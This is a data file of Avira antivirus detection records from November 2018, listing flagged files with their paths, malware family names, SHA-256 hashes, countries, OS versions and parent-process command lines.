  Row(detection=Row(filename='avscan-20181102-062500-ff49d086', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062500-FF49D086', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sresume.exe', filepath='\\\\?\\C:\\Microgaming\\Casino\\Luxury Casino\\sresume.exe', filesize=1024000, name='GAME/Casino.Gen.#M1.#R1'), hash='7ae0e46e8a31a2a2f4053ac6d6da849c5ee331dd7f9eae101310fe94c1c17ee8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:57:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='696c222a7b626488b0a484952facffcdb3cb45b8', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\696c222a7b626488b0a484952facffcdb3cb45b8', filesize=3904000, name='HEUR/AGEN.1004056.#M1.#R1'), hash='74a9f142e6bdd3516fbc8202af4fc9370b6af726895ac899075496dfad700c70', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:24:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:31:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060719-86a0b75d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060719-86A0B75D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='csproj.dll', filepath='C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VC#\\VCSPackages\\csproj.dll', filesize=1984000, name='W32/Ramnit.CD.#M1.#R1'), hash='7f45aed6fe42f14a6176e557916685223708d5354edccc2caff8ad686b29cab2', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T00:27:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053846-89ec47ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053846-89EC47BA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060023-8edf797b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060023-8EDF797B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060649-750a1d90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060649-750A1D90', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055757-37ad5e4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055757-37AD5E4B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b089b763ce856ca478bc4016562edba9cef90f46', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\b089b763ce856ca478bc4016562edba9cef90f46', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M300.#R100322'), hash='81b5e6a1ff5509fe1390eca7734d63a2bfb1ce4caa6e334a63cc2d95d4c7c89f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054151-f7ffb444', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054151-F7FFB444', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053341-d3a28957', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053341-D3A28957', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053708-4ef2078e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053708-4EF2078E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060712-823adc74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060712-823ADC74', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055106-42dca2e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055106-42DCA2E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055909-6257aa74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055909-6257AA74', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-091024-9bc3253f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0325020e\\AVSCAN-20181101-090025-3A08BDB6\\AVSCAN-20181101-091024-9BC3253F', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='01a8b234055d80db96a6d517af5b4ea90037f41dc4e55b7f6f240759c955470a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:10:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='28 juli 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\2015\\TRAINING KARYAWAN BARU\\dokumentasi 28 juli 2015\\28 juli 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prosedur.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\LPA\\AUDIT\\AUDIT LAPANGAN\\PROSEDUR\\PROSEDUR.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T21:03:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='februari.exe', filepath='D:\\DATA_SHARE\\audit\\FEBRUARI\\FEBRUARI.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-103446-146cd659', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27d3c769\\AVSCAN-20181101-103330-0B109C9C\\AVSCAN-20181101-103446-146CD659', filesize=256000, name='TR/Qadars.W.#M1.#R1'), hash='2f1b558a52a9d6e2ac57db7a2e2813a8811f391ae4c45f5eee5a709bf3b43791', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:04:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155156-98b47cd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155156-98B47CD5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155449-b5c3a3d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155449-B5C3A3D8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T20:08:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154812-7307f05a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154812-7307F05A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155621-c54f74de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155621-C54F74DE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154952-83bcb62d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154952-83BCB62D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='150805.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PROGRM\\komp02\\150805\\150805.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='307dc7a81ab0414fdc5a24ad6448bb9d06d919c59abd060b0d8f9d04fcb1c95f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\307DC7A81AB0414FDC5A24AD6448BB9D06D919C59ABD060B0D8F9D04FCB1C95F', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='307dc7a81ab0414fdc5a24ad6448bb9d06d919c59abd060b0d8f9d04fcb1c95f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:59:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='26816da087efbf97adfcb5b42a635419892d958afcbc999b4da7e951389884ed', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='04. country special hits 1.exe', filepath='E:\\music\\song-เพลงฝรั่ง\\04. Country Special Hits 1\\04. Country Special Hits 1.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='4d0aee1e921dcc5fb0abbd3a1dee3e393a6a5ade5016580192222c3ce412ea88', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:37:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7047220\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\mx-vs-atv-reflex_4097053454.exe', parentsize=2418296, timestamp='2018-11-01T06:32:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155940-e6cf6b2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155940-E6CF6B2B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155542-beb9d5c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155542-BEB9D5C6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhf3b2', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHF3B2', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:42:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f7c6424485865fc6050d238220091f4e8d0e2e53', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\f7c6424485865fc6050d238220091f4e8d0e2e53', filesize=2048000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='bacd2e2c3c9bd3384fbbbd0719ba5975a9320d6e5f5909e2993450fd71ab918c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8c2cd58b2daa2929a126ba29a4fb8a58bd2553becae877b98994dc80c082bde1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries28.10.2018-4.available\\Avira\\8C2CD58B2DAA2929A126BA29A4FB8A58BD2553BECAE877B98994DC80C082BDE1', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='8c2cd58b2daa2929a126ba29a4fb8a58bd2553becae877b98994dc80c082bde1', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:24:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T03:47:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='launchu3.exe', filepath='E:\\LaunchU3.exe', filesize=1024000, name='W32/Sality.Y.#M1.#R1'), hash='7ebedb488a7522e84070a9473730feea56465f43e75f43f65b4134c42c3f34ef', metadata=Row(cmdline=None, country='YE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T18:13:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rapat 3.exe', filepath='I:\\PPKD\\Rapat 3\\Rapat 3.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R3740'), hash='d1a821971ed8642d258ee65db27b91fddd28d902f9ec4e17322a39ee7beb6b5d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T02:23:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-233348-f8c775a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7426d2e\\AVSCAN-20181031-233120-EBE69076\\AVSCAN-20181031-233348-F8C775A5', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='7d74dd61060c0c11796f1bc3fc48e0a061a002c9a049758d5d7bd1a2912e3f8e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spintires.exe', filepath='E:\\Spintires\\SpinTires.exe', filesize=8768000, name='W32/Ramnit.CD.#M1.#R1'), hash='9466ffe16e79b2ebf670be608b654c079eb5a38c305be9890bb5176eeecb6c92', metadata=Row(cmdline='--engine=2 --session-id=KU5\\\\\\/NVMmFspVb9nPIhYNQyA8XkaIEObG67OcpvZY --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-01T18:35:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cardsdllzf.dll', filepath='j:\\محمد\\الأنشطة\\الافراح\\برامج\\gta san andrea  saudi\\new folder\\p fifa 13\\game\\dlc\\dlc_cardsdll\\dlc\\CardsDLLzf.dll', filesize=1920000, name='W32/Ramnit.CD.#M1.#R1'), hash='72537cf097360d54f80dc5187e01d2ce6dea60070417b93a43dfc7ac963a1d5e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:14:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\Zec Miner 0.3.4b\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:00:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='forza+horizon+4.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\7zO876DA9A1\\Forza+Horizon+4.exe', filesize=2176000, name='HEUR/AGEN.1017525.#M1.#R1'), hash='5deadbbe1b1bb51a89a4c03220f1a927b807aa620afa63b4314a7ac9437e0ee5', metadata=Row(cmdline='-Embedding', country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SettingSyncHost.exe', parentsize=828320, timestamp='2018-11-01T18:27:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cmtransfer.exe', filepath='G:\\cmTransfer.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:49:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='taskeng.exe', filepath='C:\\Windows\\System32\\taskeng.exe', filesize=192000, name='TR/Patched.Gen.#M300.#R2947'), hash='baae1a15dd2715e61d17b9832c85d3fe77674867157c467655041e945908fee4', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:14:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215658-3cf2b9f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215658-3CF2B9F7', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:57:00Z'), dt=datetime.date(2018, 11, 1)),
